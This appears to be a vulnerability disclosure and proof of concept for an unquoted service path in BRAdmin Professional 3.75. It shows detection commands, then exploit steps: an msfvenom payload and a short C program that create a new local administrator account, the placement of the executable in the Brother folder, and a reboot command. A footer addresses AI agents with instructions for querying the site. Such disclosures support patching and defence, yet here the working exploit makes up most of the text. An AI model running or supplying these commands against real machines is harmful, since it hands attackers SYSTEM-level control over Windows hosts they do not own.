# BRAdmin Professional 3.75 - Unquoted Service Path *"BRAdmin Professional 3.75 software allows system administrators to view and control the status of their networked Brother and most other SNMP compliant printing devices."* ## Proof Of Concept If a user can insert a executable which is called as "BRAdmin" under the `C:\Program Files (x86)\Brother\` directory , local system privileges could be obtained by the user. For example, an user that has administrative privileges can obtain **`SYSTEM`** privileges through the vulnerable service. This situation is valuable, especially if additional writing permission is applied to `\Brother\` directory for unprivileged user. ``` #Detection of unquoted service path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "BRAdmin" |findstr /i /v """ Brother BRAdminPro Scheduler BRA_Scheduler C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe Auto C:\>sc qc BRA_Scheduler [SC] QueryServiceConfig SUCCESS SERVICE_NAME: BRA_Scheduler TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Brother\BRAdmin Professional 3\bratimer.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Brother BRAdminPro Scheduler DEPENDENCIES : SERVICE_START_NAME : LocalSystem ``` ### Steps to Reproduce: 1- User has a write privilege to `\Brother\` directory and creates msfvenom payload that adds new localadmin user to Windows computer. ``` msfvenom -p windows/adduser USER=unsafe PASS=In.line13 -f exe > BRAdmin.exe ``` ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW5zkMBfskxH_VwPbkz%2F-MW606TdKMT5kaEvNWVP%2F1.PNG?alt=media\&token=98b14885-f4be-4636-9b35-88f7bd0957c1) 2- Then user downloads this executable under the `\Brother\` directory and restarts the computer. ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW5zkMBfskxH_VwPbkz%2F-MW61MLiQVlXsP-RHuzg%2F2.PNG?alt=media\&token=87daf106-6185-468a-8df4-29a5c10cc971) ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW61NnxEi2SLYr2jRfO%2F-MW61SiZLh4N3XUrf6iS%2F3.PNG?alt=media\&token=c49a70bc-fdca-4baa-8fce-58d8b898c61d) For restarting computer from command line: ``` shutdown /r /t 0 ``` 3- After the restarting process , `unsafe` user will be created and added the local Administrators group. ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW62vm1QrzGWWCEVBaQ%2F-MW63ikVCka-O_O1Fz_f%2F4.PNG?alt=media\&token=14d54279-6849-4964-97bf-2630e65aa112) Windows Defender will detect the `BRAdmin.exe` executable as malicious after the `unsafe`user is added the local administrators group if target didn't make last Windows update properly. ![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MW63joxx3I9hipyVbs1%2F-MW67LrjVf9X8HtXyIAr%2F5.PNG?alt=media\&token=86bb2f61-89e3-4785-a8d7-6c926debe1d0) Or below code could be used after compiling with gcc. ``` #include int main () { int i; i = system("net user joker j@k3r.. /add & net localgroup Administrators joker /add"); return 0; } ``` `i686-w64-mingw32-gcc addLocalAdmin.c -lws2_32 -o add.exe` {% embed url="" %} 
# Author: Metin Yunus Kandemir
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://docs.unsafe-inline.com/0day/bradmin-professional-3.75-unquoted-service-path.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.